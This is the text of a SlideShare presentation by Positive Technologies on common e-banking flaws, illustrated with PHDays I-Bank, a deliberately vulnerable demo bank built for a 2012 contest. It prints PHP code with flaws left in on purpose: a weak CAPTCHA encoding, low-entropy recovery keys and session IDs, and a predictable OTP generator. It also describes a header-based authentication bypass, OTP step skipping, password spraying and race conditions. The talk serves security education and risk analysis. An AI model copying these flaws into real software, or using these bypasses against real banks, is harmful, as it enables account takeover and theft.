Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
SlideShare a Scribd company logo

Typical Vulnerabilities of E-Banking Systems

Download as PPTX, PDF
Positive Hack Days
Positive Hack Days

The document summarizes typical vulnerabilities found in e-banking systems by examining vulnerabilities in a demo remote banking system called PHDays I-Bank. Some vulnerabilities discussed include predictable user identifiers, weak password policies allowing short or dictionary passwords, methods for bypassing account locking and CAPTCHAs, weak password recovery processes, low entropy session identifiers and one-time passwords, and ways to conduct transactions without OTP validation. The document aims to demonstrate how such vulnerabilities could allow unauthorized access to accounts or denial of service attacks on real banking systems.

1 of 49
Typical Vulnerabilities of E-Banking Systems Typical Vulnerabilities of E-Banking Systems Sergey Scherbel Dmitry Evteev Eugenie Potseluevskaya Positive Technologies
Future Now Vulnerabilities of Remote Banking As Examplified by PHDays I-Bank
Future Now Vulnerabilities of Remote Banking As Examplified by PHDays I-Bank PHDays I-Bank IS NOT a real remote banking system actually used by any bank. The system was developed specially for PHDays 2012 PHDays I-Bank contains vulnerabilities typical of real remote banking systems Some of the vulnerabilities are found too often
Future Now Identification Predictable user identifiers are far more dangerous than it can seem! A PHDays I-Bank identifier consists of numbers, just like most identifiers in actual remote banking systems Examples of identifiers: 1000001, 1000002, … What’s wrong with it? We'll explain a bit later 
Future Now Password Policy Weak password policy - a problem of all times! The default password is strong, but user can change it for a weak one Even for one composed only of 1 character! The only thing that gets checked is the length of the password So, we're certain to find something like 1234567 or 12345678 Check On Regular Expression Problem - dictionary passwords, for example, P@ssw0rd
Future Now Brute Force? Brute Force against Internet banking? What about security? Types of protection from brute force attacks: Locking accounts Locking IP addresses Using CAPTCHA
Future Now Locking is not the answer! It's easy to bypass these protection mechanisms An account or IP address gets locked after a number of failed authorization attempts (usually 3 or 5). Predictable and weak identifiers Weak password policy ??????? Profit!!!!111
Future Now Locking is not the answer! 1000001 1000002 Collect identifiers 1000003 ... Choose 1 or 2 passwords 1001421:12345678 Match identifiers 1002236:12345678 against passwords, 1002313:12345678 not passwords ... against identifiers
Future Now Locking leads to Denial of Service! After a few failed authentication attempts, the accounts gets locked You can attack a target user If you know all the identifiers... You can conduct a large-scale DoS attack As a rule, to unlock the account, users have to contact the bank office Someone's day might be ruined
Future Now Locking IP Address Locking an IP address is not more prudent. Most companies assign the same external IP address to all its employees Numerous authentication attempts can be treated like a brute- force attempt, thus leading to lock-up of the IP address
Future Now CAPTCHA Problem Possible repetitive sending of the same value The value is sent in the hidden field of the HTML form Sending of an empty value is possible Insufficient validation: it's OK if the length is appropriate or there are certain characters CAPTCHA is not checked for certain headers
Future Now CAPTCHA Problem in PHDays I-Bank The value is sent in a hidden field of the HTML form public function encodeCaptchaCode($code) { return @base64_encode(@strrev(@base64_encode($code))); } Encrypting does not use temporal values, it’s a peace of cake to decrypt a line PUlUTndVVE0=  =ITNwUTM  MTUwNTI=  15052
Future Now CAPTCHA Problem in PHDays I-Bank Besides, one and the same value can be sent repeatedly So, you can conduct a brute-force attack on the account!
Future Now Password Recovery Almost every web application provides for a password recovery. PHDays I-Bank is not an exception
Future Now Password Recovery: Problems If password recovery requires not an email, but an identifier, we can get all identifiers used in the system
Future Now Password Recovery: Problems Some users of the I-Bank could recover their passwords via a web form For others, the rules provided the only recovery way: to contact a bank office  ‘Please contact any office of the PHDays bank for password recovery’
Future Now Password Recovery: Problems The key required for password recovery is generated with weak entropy private function addDataInTable($login) { $key = md5($login.rand(1, 250)); To guess the key, one needs to go through only 250 values! Then a new password will be created
Future Now Weak Entropy of Session Identifier If a session uses its own mechanisms, reliability of identifiers is crucial In PHDays I-Bank identifiers are generated according to a special algorithm private function getSpecialHash($password) { $hash = sprintf("%u", crc32($password)); if(strlen($hash) > 4) { $hash = substr($hash, 0, 4);
Future Now Weak Entropy of Session Identifier The session identifier consists of only 4 characters All characters are numerical, which reduces entropy The session identifier is static. It changes only if the user changes his/her password
Future Now Weak Entropy of Session Identifier Cookie: auth=1000001|2|3016
Future Now Problems with Privilege Isolation While a possibility to transfer money from other accounts is extremely rare, a possibility to address other users' data can still be found Some systems allow sending messages to the support service on behalf of any user Others that allow editing payment templates of other users Such vulnerabilities were not embedded into PHDays I-Bank
Future Now One-time Password One-time passwords are used to protect systems from unauthorized activities (transactions, password change, editing personal data) OTP can be requested either after the initial authentication (login and password) Or before each new transaction (or other action)
Future Now One-Time Password in PHDays I-Bank PHDays I-Bank had 2 types of OTP: Emulation of an external device It was implemented as the TransactionA class in the code OTP on scratch cards It was implemented as the TransactionB class in the code
Future Now One-Time Password, Problems OTP is not requested to transfer small amounts of money (for example, up to $100) One and the same OTP can be sent repeatedly OTP can be predicted Some users disable OTP validation In PHDays I-Bank, transactions without OTP were carried out in TransactionC. User can skip OTP validation and perform the transaction stright away
Future Now One-Time Password, TransactionA OTP is impossible to predict However, the OTP validation step can be skipped to perform the transaction straight away!
Future Now One-Time Password, TransactionA Change step3 for step4
Future Now One-Time Password, TransactionA Profit!!11 Transaction is successfully completed. Simple bypass of a reliable protection
Future Now One-Time Password, TransactionB Algorithm of OTP generation protected function generateOTP() { $OTPs = array(); $s = 44553 + $this->userInfo["id"]; // the variable depends only on // the user's number for($n = 10; $n < 24; $n++) { // generating 14 OTP $OTP = ""; $j = rand(20,39); // the $s variable can take on $j = substr($j, 0, 1); // only two values – 2 or 3 $OTP = $n*$s*$j; $OTP = substr($OTP, 0, 5); // OTP consists of 5 characters $OTPs[] = $OTP;
Future Now One-Time Password, TransactionB OTP can take on only 2 values
Future Now One-Time Password, TransactionC OTP is not requested - transactions can be completed freely In PHDays I-Bank, there were not many users who were not requested OTP for transaction But some participants got lucky 
Future Now Actions without OTP Sometimes OTP is requested only for transactions, while other actions could be completed without it: Send a message to Support Service Change the password Change the payment template Create a payment template Open a new account
Future Now Changing Payment Template Payment templates allow saving time on entering similar data: Recipient's account Recipient's name If an attacker has a chance to change the template data, they can easily change the recipient's account for theirs. The user is likely to overlook the change and confirm the transaction
Future Now How Was It 20,000 rubles (about $700) - the prize fund The day before the competition, participants received the source code of the systems and a virtual machine with installed PHDays I-Bank Then, the participants had 20-30 minutes to use vulnerabilities they had found Automation of the process decided the winning side. Hypothreading played a critical role!
Future Now 2 Tasks to Succeed The competition could virtually be divided into 2 tasks: Gaining access to the account Simple and dictionary passwords Weak entropy of the password recovery key Weak entropy of session identifier OTP bypass OTP was not requested The OTP validation step could be skipped Predictable OTP
Future Now Distribution of Vulnerabilities Distribution of Vulnerabilities 30 18 Simple password Dictionary password 100 Session ID Recovery key 52
Future Now Distribution of Vulnerabilities The money was distributed according to a simple principle: the more difficult it is to get the access, the more money it "costs" The accounts used for demonstration had weak passwords - 1234567 and password The participants' accounts were also vulnerable: the session identifier had weak entropy The most reasonable strategy to follow was to transfer all the money of other participants closer to the end of the competition
Future Now HelpDesk Together with the remote banking, we implemented an elementary HelpDesk HelpDesk is a system for the employees of the bank The main idea was if an attacker managed to get into the "restricted-access" system, they would have enough information to hack the entire system In practice: Password policy, information on protection mechanisms and even user passwords
Future Now HelpDesk in PHDays I-Bank Discussions that hinted at the details to consider Link to the system that displayed users with simple passwords 
Future Now HelpDesk, Authentication Bypass HelpDesk is vulnerable to authentication bypass: You don't need to know the login or the password Just send the following header in each HTTP request if(isset($_SERVER["HTTP_BANKOFFICEUSER"])) { $userId = base64_decode($_SERVER["HTTP_BANKOFFICEUSER"]); $userInfo = $this->user->getUserInfoById($userId); $this->user->setupUserInfo($userInfo); return $this->user; }
Future Now HelpDesk, Authentication Bypass Modify Header - handy for the exploitation:
Future Now Race condition If you send a lot of requests, it can probably lead to a situation when all of the requests will be processed at a time: Request N Request N + 1 Checking for the Checking for the required amount required amount Depositing Depositing Profit! $$$
Future Now Race Condition, Nginx To get protected from Race condition and prevent the situation when money appears from nowhere, nginx was set to block the messages coming too often The limit was 3 requests per second to the script that fulfilled the transactions. Nginx was not installed on the virtual machines, so one of the participants found the Race condition problem.
Future Now Business Impact Analysis - How much would it cost? Assumptions: I-Bank’s capital is 300 million dollars 100 000 clients use online banking services Average sum on every account is 1000 dollars Profit from every client is 500 dollars Operating costs to change users’ passwords – $0,15 for a password Reissuing of one scratch card costs 15 dollars
Future Now Business Impact Analysis – Impact (in millions of dollars)
Future Now Business Impact Analysis – Impact
Future Now Business Impact Analysis: Exploitation Probabilities Distribution of Password Vulnerabilities 30 18 Simple password - 90% Dictionary password -90% 100 Session ID - 70% Recovery key - 50% 52 Distribution of OTP Vulnerabilities 40 80 External Device - 90% Scratch Cards -90% No OTP - 100% 80
Future Now Business Impact Analysis – Risk Assessment Risk=Impact x Probability Probability is 0,54% Risk=9% of the capital Risk level of over 3% of the capital is regarded as critical for a bank!
Future Now Business Impact Analysis: make the right choice Forewarned is forearmed (millions of dollars)
Thank you for your attention

More Related Content

Typical Vulnerabilities of E-Banking Systems

  • 1. Typical Vulnerabilities of E-Banking Systems Typical Vulnerabilities of E-Banking Systems Sergey Scherbel Dmitry Evteev Eugenie Potseluevskaya Positive Technologies
  • 2. Future Now Vulnerabilities of Remote Banking As Examplified by PHDays I-Bank
  • 3. Future Now Vulnerabilities of Remote Banking As Examplified by PHDays I-Bank PHDays I-Bank IS NOT a real remote banking system actually used by any bank. The system was developed specially for PHDays 2012 PHDays I-Bank contains vulnerabilities typical of real remote banking systems Some of the vulnerabilities are found too often
  • 4. Future Now Identification Predictable user identifiers are far more dangerous than it can seem! A PHDays I-Bank identifier consists of numbers, just like most identifiers in actual remote banking systems Examples of identifiers: 1000001, 1000002, … What’s wrong with it? We'll explain a bit later 
  • 5. Future Now Password Policy Weak password policy - a problem of all times! The default password is strong, but user can change it for a weak one Even for one composed only of 1 character! The only thing that gets checked is the length of the password So, we're certain to find something like 1234567 or 12345678 Check On Regular Expression Problem - dictionary passwords, for example, P@ssw0rd
  • 6. Future Now Brute Force? Brute Force against Internet banking? What about security? Types of protection from brute force attacks: Locking accounts Locking IP addresses Using CAPTCHA
  • 7. Future Now Locking is not the answer! It's easy to bypass these protection mechanisms An account or IP address gets locked after a number of failed authorization attempts (usually 3 or 5). Predictable and weak identifiers Weak password policy ??????? Profit!!!!111
  • 8. Future Now Locking is not the answer! 1000001 1000002 Collect identifiers 1000003 ... Choose 1 or 2 passwords 1001421:12345678 Match identifiers 1002236:12345678 against passwords, 1002313:12345678 not passwords ... against identifiers
  • 9. Future Now Locking leads to Denial of Service! After a few failed authentication attempts, the accounts gets locked You can attack a target user If you know all the identifiers... You can conduct a large-scale DoS attack As a rule, to unlock the account, users have to contact the bank office Someone's day might be ruined
  • 10. Future Now Locking IP Address Locking an IP address is not more prudent. Most companies assign the same external IP address to all its employees Numerous authentication attempts can be treated like a brute- force attempt, thus leading to lock-up of the IP address
  • 11. Future Now CAPTCHA Problem Possible repetitive sending of the same value The value is sent in the hidden field of the HTML form Sending of an empty value is possible Insufficient validation: it's OK if the length is appropriate or there are certain characters CAPTCHA is not checked for certain headers
  • 12. Future Now CAPTCHA Problem in PHDays I-Bank The value is sent in a hidden field of the HTML form public function encodeCaptchaCode($code) { return @base64_encode(@strrev(@base64_encode($code))); } Encrypting does not use temporal values, it’s a peace of cake to decrypt a line PUlUTndVVE0=  =ITNwUTM  MTUwNTI=  15052
  • 13. Future Now CAPTCHA Problem in PHDays I-Bank Besides, one and the same value can be sent repeatedly So, you can conduct a brute-force attack on the account!
  • 14. Future Now Password Recovery Almost every web application provides for a password recovery. PHDays I-Bank is not an exception
  • 15. Future Now Password Recovery: Problems If password recovery requires not an email, but an identifier, we can get all identifiers used in the system
  • 16. Future Now Password Recovery: Problems Some users of the I-Bank could recover their passwords via a web form For others, the rules provided the only recovery way: to contact a bank office  ‘Please contact any office of the PHDays bank for password recovery’
  • 17. Future Now Password Recovery: Problems The key required for password recovery is generated with weak entropy private function addDataInTable($login) { $key = md5($login.rand(1, 250)); To guess the key, one needs to go through only 250 values! Then a new password will be created
  • 18. Future Now Weak Entropy of Session Identifier If a session uses its own mechanisms, reliability of identifiers is crucial In PHDays I-Bank identifiers are generated according to a special algorithm private function getSpecialHash($password) { $hash = sprintf("%u", crc32($password)); if(strlen($hash) > 4) { $hash = substr($hash, 0, 4);
  • 19. Future Now Weak Entropy of Session Identifier The session identifier consists of only 4 characters All characters are numerical, which reduces entropy The session identifier is static. It changes only if the user changes his/her password
  • 20. Future Now Weak Entropy of Session Identifier Cookie: auth=1000001|2|3016
  • 21. Future Now Problems with Privilege Isolation While a possibility to transfer money from other accounts is extremely rare, a possibility to address other users' data can still be found Some systems allow sending messages to the support service on behalf of any user Others that allow editing payment templates of other users Such vulnerabilities were not embedded into PHDays I-Bank
  • 22. Future Now One-time Password One-time passwords are used to protect systems from unauthorized activities (transactions, password change, editing personal data) OTP can be requested either after the initial authentication (login and password) Or before each new transaction (or other action)
  • 23. Future Now One-Time Password in PHDays I-Bank PHDays I-Bank had 2 types of OTP: Emulation of an external device It was implemented as the TransactionA class in the code OTP on scratch cards It was implemented as the TransactionB class in the code
  • 24. Future Now One-Time Password, Problems OTP is not requested to transfer small amounts of money (for example, up to $100) One and the same OTP can be sent repeatedly OTP can be predicted Some users disable OTP validation In PHDays I-Bank, transactions without OTP were carried out in TransactionC. User can skip OTP validation and perform the transaction stright away
  • 25. Future Now One-Time Password, TransactionA OTP is impossible to predict However, the OTP validation step can be skipped to perform the transaction straight away!
  • 26. Future Now One-Time Password, TransactionA Change step3 for step4
  • 27. Future Now One-Time Password, TransactionA Profit!!11 Transaction is successfully completed. Simple bypass of a reliable protection
  • 28. Future Now One-Time Password, TransactionB Algorithm of OTP generation protected function generateOTP() { $OTPs = array(); $s = 44553 + $this->userInfo["id"]; // the variable depends only on // the user's number for($n = 10; $n < 24; $n++) { // generating 14 OTP $OTP = ""; $j = rand(20,39); // the $s variable can take on $j = substr($j, 0, 1); // only two values – 2 or 3 $OTP = $n*$s*$j; $OTP = substr($OTP, 0, 5); // OTP consists of 5 characters $OTPs[] = $OTP;
  • 29. Future Now One-Time Password, TransactionB OTP can take on only 2 values
  • 30. Future Now One-Time Password, TransactionC OTP is not requested - transactions can be completed freely In PHDays I-Bank, there were not many users who were not requested OTP for transaction But some participants got lucky 
  • 31. Future Now Actions without OTP Sometimes OTP is requested only for transactions, while other actions could be completed without it: Send a message to Support Service Change the password Change the payment template Create a payment template Open a new account
  • 32. Future Now Changing Payment Template Payment templates allow saving time on entering similar data: Recipient's account Recipient's name If an attacker has a chance to change the template data, they can easily change the recipient's account for theirs. The user is likely to overlook the change and confirm the transaction
  • 33. Future Now How Was It 20,000 rubles (about $700) - the prize fund The day before the competition, participants received the source code of the systems and a virtual machine with installed PHDays I-Bank Then, the participants had 20-30 minutes to use vulnerabilities they had found Automation of the process decided the winning side. Hypothreading played a critical role!
  • 34. Future Now 2 Tasks to Succeed The competition could virtually be divided into 2 tasks: Gaining access to the account Simple and dictionary passwords Weak entropy of the password recovery key Weak entropy of session identifier OTP bypass OTP was not requested The OTP validation step could be skipped Predictable OTP
  • 35. Future Now Distribution of Vulnerabilities Distribution of Vulnerabilities 30 18 Simple password Dictionary password 100 Session ID Recovery key 52
  • 36. Future Now Distribution of Vulnerabilities The money was distributed according to a simple principle: the more difficult it is to get the access, the more money it "costs" The accounts used for demonstration had weak passwords - 1234567 and password The participants' accounts were also vulnerable: the session identifier had weak entropy The most reasonable strategy to follow was to transfer all the money of other participants closer to the end of the competition
  • 37. Future Now HelpDesk Together with the remote banking, we implemented an elementary HelpDesk HelpDesk is a system for the employees of the bank The main idea was if an attacker managed to get into the "restricted-access" system, they would have enough information to hack the entire system In practice: Password policy, information on protection mechanisms and even user passwords
  • 38. Future Now HelpDesk in PHDays I-Bank Discussions that hinted at the details to consider Link to the system that displayed users with simple passwords 
  • 39. Future Now HelpDesk, Authentication Bypass HelpDesk is vulnerable to authentication bypass: You don't need to know the login or the password Just send the following header in each HTTP request if(isset($_SERVER["HTTP_BANKOFFICEUSER"])) { $userId = base64_decode($_SERVER["HTTP_BANKOFFICEUSER"]); $userInfo = $this->user->getUserInfoById($userId); $this->user->setupUserInfo($userInfo); return $this->user; }
  • 40. Future Now HelpDesk, Authentication Bypass Modify Header - handy for the exploitation:
  • 41. Future Now Race condition If you send a lot of requests, it can probably lead to a situation when all of the requests will be processed at a time: Request N Request N + 1 Checking for the Checking for the required amount required amount Depositing Depositing Profit! $$$
  • 42. Future Now Race Condition, Nginx To get protected from Race condition and prevent the situation when money appears from nowhere, nginx was set to block the messages coming too often The limit was 3 requests per second to the script that fulfilled the transactions. Nginx was not installed on the virtual machines, so one of the participants found the Race condition problem.
  • 43. Future Now Business Impact Analysis - How much would it cost? Assumptions: I-Bank’s capital is 300 million dollars 100 000 clients use online banking services Average sum on every account is 1000 dollars Profit from every client is 500 dollars Operating costs to change users’ passwords – $0,15 for a password Reissuing of one scratch card costs 15 dollars
  • 44. Future Now Business Impact Analysis – Impact (in millions of dollars)
  • 45. Future Now Business Impact Analysis – Impact
  • 46. Future Now Business Impact Analysis: Exploitation Probabilities Distribution of Password Vulnerabilities 30 18 Simple password - 90% Dictionary password -90% 100 Session ID - 70% Recovery key - 50% 52 Distribution of OTP Vulnerabilities 40 80 External Device - 90% Scratch Cards -90% No OTP - 100% 80
  • 47. Future Now Business Impact Analysis – Risk Assessment Risk=Impact x Probability Probability is 0,54% Risk=9% of the capital Risk level of over 3% of the capital is regarded as critical for a bank!
  • 48. Future Now Business Impact Analysis: make the right choice Forewarned is forearmed (millions of dollars)
  • 49. Thank you for your attention